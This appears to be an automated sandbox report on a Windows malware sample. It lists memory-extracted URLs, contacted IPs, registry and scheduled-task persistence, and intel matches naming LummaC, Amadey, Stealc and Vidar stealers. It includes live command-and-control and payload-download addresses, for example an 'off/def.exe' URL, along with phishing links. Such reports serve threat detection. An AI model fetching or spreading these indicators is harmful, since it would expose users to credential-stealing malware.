http://185.215.113.206Local	file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000002.00000003.1796255477.000001410475F000.00000004.00000800.00020000.00000000.sdmp	false
https://www.gccwebshop.comPTrial	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://go.microsof	e708276138.exe, 00000013.00000002.2912096877.0000000001300000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000000.00000002.2043049111.0000000000957000.00000040.00000001.01000000.00000003.sdmp	false
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.xfcut.com/activation	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.starcraftvinyl.com/create&http://www.starcraftvinyl.com/activate	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.starcraftvinyl.com/activate	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://frogmen-smell.sbs/ty	e708276138.exe, 00000013.00000003.2795537955.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000002.00000003.1796255477.0000014104722000.00000004.00000800.00020000.00000000.sdmp	false
https://www.easycutpro.comOTrial	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.xfcut.com/store	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.innosetup.com/	stories.exe, 0000000C.00000003.2432246049.000000007FBE0000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 0000000C.00000003.2431755881.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 0000000D.00000000.2433580876.0000000000401000.00000020.00000001.01000000.00000010.sdmp	false
http://www.craftedge.com/activation/createspace	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2070728009.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	false
http://www.craftedge.com/activation/greatcut	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.206/f0	df5dd36577.exe, 00000014.00000002.2677024586.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/apieG	e708276138.exe, 00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs:443/apitPK	e708276138.exe, 00000017.00000002.2955044148.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	false
http://www.craftedge.comPTrial	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://frogmen-smell.sbs/&	e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	false
https://www.craftedge.com/activation	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.rootca1.amazontrust.com/rootca1.crl0	e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	false
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2827320190.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.craftedge.com/activation/surecutsalot/xfcut.php?	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.206/c4becf79229cb002.php/	df5dd36577.exe, 00000014.00000002.2677024586.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.craftedge.com/activation/surecutsalot/greatcutd.php?	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.206/c4becf79229cb002.php0	df5dd36577.exe, 00000014.00000002.2677024586.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.rootca1.amazontrust.com0:	e708276138.exe, 00000013.00000003.2607124182.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2733169975.0000000005980000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2821844177.0000000005642000.00000004.00000800.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1877342836.000000001D93D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp, e708276138.exe, 00000013.00000003.2573895190.0000000005B47000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2573741961.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.00000000059A7000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2699349639.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005659000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784313428.0000000005660000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973388577.0000000005AC0000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A66000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.php-	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	e708276138.exe, 00000013.00000003.2575286477.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575565822.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2575135608.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2701063972.0000000005999000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2785151734.000000000564B000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2976640514.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2977376148.0000000005A58000.00000004.00000800.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/3	e708276138.exe, 00000015.00000003.2816346098.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2796621255.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	e708276138.exe, 00000017.00000003.2826453007.000000000572C000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.php2	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp	false
https://www.craftedge.com/activation/surecutsalot/xfcut_k.php?	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.206/c4becf79229cb002.php?	df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/mv	e708276138.exe, 00000013.00000003.2573057992.000000000136E000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.micro	e708276138.exe, 00000015.00000003.2957881844.000000000139F000.00000004.00000020.00020000.00000000.sdmp	false
http://www.easycutstudio.com	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.craftedge.com/activation/magiccutdstudio/activate.php?Dhttps://www.craftedge.com/activati	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://frogmen-smell.sbs/tAc:	e708276138.exe, 00000017.00000003.2872275644.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	false
https://support.microsof	e708276138.exe, 00000013.00000003.2573741961.0000000005B50000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2699349639.00000000059B0000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784313428.0000000005662000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973388577.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/steam/random.exe1&Z	e708276138.exe, 00000013.00000003.2796131951.000000000135E000.00000004.00000020.00020000.00000000.sdmp	false
http://www.pss.co	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://go.microsoft.c	76f1524c8d.exe, 00000018.00000002.2892554824.00000000009FF000.00000004.00000020.00020000.00000000.sdmp	false
http://www.craftedge.com/activation/cut	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.16/off/def.exe	e708276138.exe, e708276138.exe, 00000013.00000003.2797158871.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2796131951.000000000135E000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2912096877.0000000001300000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2795934444.0000000001381000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2911002592.00000000010FA000.00000004.00000010.00020000.00000000.sdmp, e708276138.exe, 00000015.00000002.3040356787.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2957471962.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	e708276138.exe, 00000013.00000003.2573895190.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2700467839.0000000005982000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2784517246.0000000005634000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 0000001E.00000003.2973735185.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, e708276138.exe, 00000023.00000003.3082797260.0000000005A02000.00000004.00000800.00020000.00000000.sdmp	false
https://www.easycutstudio.com/support.html	stories.exe, 0000000C.00000003.2430863869.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 0000000D.00000003.2435026251.00000000033F0000.00000004.00001000.00020000.00000000.sdmp	false
http://185.215.113.206/68b591d6548ec281/msvcp140.dllQ	file.exe, 00000000.00000002.2044630050.0000000001667000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpS	df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpdU	df5dd36577.exe, 00000014.00000002.2677024586.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/off/def.exe9Pi	e708276138.exe, 00000013.00000003.2796131951.000000000135E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpV	file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp, df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	file.exe, 00000000.00000003.1967046345.0000000023CAD000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/off/def.exeJ5	e708276138.exe, 00000015.00000002.3038323836.0000000000DFA000.00000004.00000010.00020000.00000000.sdmp	false
http://vinylcut.co.za/activation	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpc	df5dd36577.exe, 00000019.00000002.2861182508.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.craftedge.com/activation/cut/activate.php??https://www.craftedge.com/activation/surecuts	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	stories.exe, 0000000C.00000000.2430258936.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	false
https://frogmen-smell.sbs/e	e708276138.exe, 00000013.00000003.2645547169.0000000001387000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000003.2642881076.0000000001385000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/apiW7	e708276138.exe, 00000017.00000003.2910370944.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/f	e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/i	e708276138.exe, 00000015.00000003.2754538301.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2757764233.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2760357723.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2738576544.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2754879744.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2730989943.00000000013D1000.00000004.00000020.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/Fc	e708276138.exe, 00000013.00000003.2675472479.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp	false
https://frogmen-smell.sbs/h	e708276138.exe, 00000017.00000003.2854908105.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	false
http://www.signwarehouse.comRTrial	shineencoder32.exe, 00000010.00000000.2454572352.000000000058E000.00000002.00000001.01000000.00000012.sdmp	false
https://frogmen-smell.sbs/k	e708276138.exe, 00000015.00000003.2816346098.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2796621255.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/O	e708276138.exe, 00000013.00000003.2796131951.000000000135E000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.78	plus.l.google.com	United States	15169	GOOGLEUS	false
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.80.55	frogmen-smell.sbs	United States	13335	CLOUDFLARENETUS	false
31.214.157.226	unknown	Germany	58329	RACKPLACEDE	false
142.250.186.110	play.google.com	United States	15169	GOOGLEUS	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
176.113.115.203	unknown	Russian Federation	49505	SELECTELRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.196	unknown	United States	15169	GOOGLEUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.164	unknown	United States	15169	GOOGLEUS	false
185.208.158.202	aipinuv.ru	Switzerland	34888	SIMPLECARRER2IT	true
89.105.201.183	unknown	Netherlands	24875	NOVOSERVE-ASNL	false

Private

IP
192.168.2.4
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556476
Start date and time:	2024-11-15 14:08:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@100/124@25/18
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 74.125.71.84, 216.58.212.174, 34.104.35.123, 142.250.185.131, 142.250.184.234, 172.217.18.10, 142.250.185.170, 216.58.206.74, 172.217.23.106, 142.250.74.202, 142.250.186.106, 216.58.212.138, 142.250.185.74, 142.250.186.138, 216.58.212.170, 172.217.16.202, 142.250.185.202, 142.250.185.138, 142.250.186.74, 142.250.185.106, 184.28.90.27, 199.232.214.172, 192.229.221.95, 184.28.89.167, 142.250.186.67, 142.250.181.238, 66.102.1.84, 88.221.170.101, 20.189.173.6, 142.250.185.234, 172.217.16.138, 51.132.193.105, 142.250.186.99, 142.250.185.110, 51.116.246.106, 52.182.143.215, 20.42.65.93
Excluded domains from analysis (whitelisted): onedscolprdgwc06.germanywestcentral.cloudapp.azure.com, onedscolprdeus20.eastus.cloudapp.azure.com, slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, clients2.google.com, go.microsoft.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, e16604.g.akamaiedge.net, learn.microsoft.com.edgekey.net, update.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, clients1.google.com, onedscolprdcus22.centralus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.m
Execution Graph export aborted for target e708276138.exe, PID 5960 because there are no executed function
Execution Graph export aborted for target file.exe, PID 4940 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
08:09:12	API Interceptor	3x Sleep call for process: svchost.exe modified
08:09:34	API Interceptor	15x Sleep call for process: file.exe modified
08:10:01	API Interceptor	15762887x Sleep call for process: skotes.exe modified
08:10:28	API Interceptor	76x Sleep call for process: e708276138.exe modified
08:10:53	API Interceptor	1264155x Sleep call for process: shineencoder32.exe modified
13:09:37	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
13:10:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run e708276138.exe C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
13:10:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run e708276138.exe C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
13:10:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run df5dd36577.exe C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe
13:10:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 76f1524c8d.exe C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe
13:11:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run df5dd36577.exe C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe
13:11:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 76f1524c8d.exe C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.45	https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4	Get hash	malicious	HTMLPhisher	Browse	nam.dcv.ms/BxPVLH2cz4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
frogmen-smell.sbs	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29t	Get hash	malicious	Unknown	Browse	13.107.246.45
	VNC Sales.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	Remittance Advice__cybg.com_4093180040.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	9tjbjRnw20.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	0p804IWZ7q.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	3zEbFFuoc9.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VVmliM0U9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
steamcommunity.com	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	104.102.49.254
	z5dejE5wp9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	JaDheaBFXI.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	OD5lecPHBl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Tu9UIpROEO.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	ftoHy3FsuB.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	alarmer.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SOfQumBuFd.exe	Get hash	malicious	Binder HackTool, Stealc, Vidar	Browse	104.102.49.254
	6DR41XLsFc.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.60
	https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29t	Get hash	malicious	Unknown	Browse	13.107.246.45
	VNC Sales.xlsx	Get hash	malicious	Unknown	Browse	52.146.76.30
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.67
	Remittance Advice__cybg.com_4093180040.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VVmliM0U9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	doc_Agilitas_9769667025.html	Get hash	malicious	Phisher	Browse	13.107.246.60
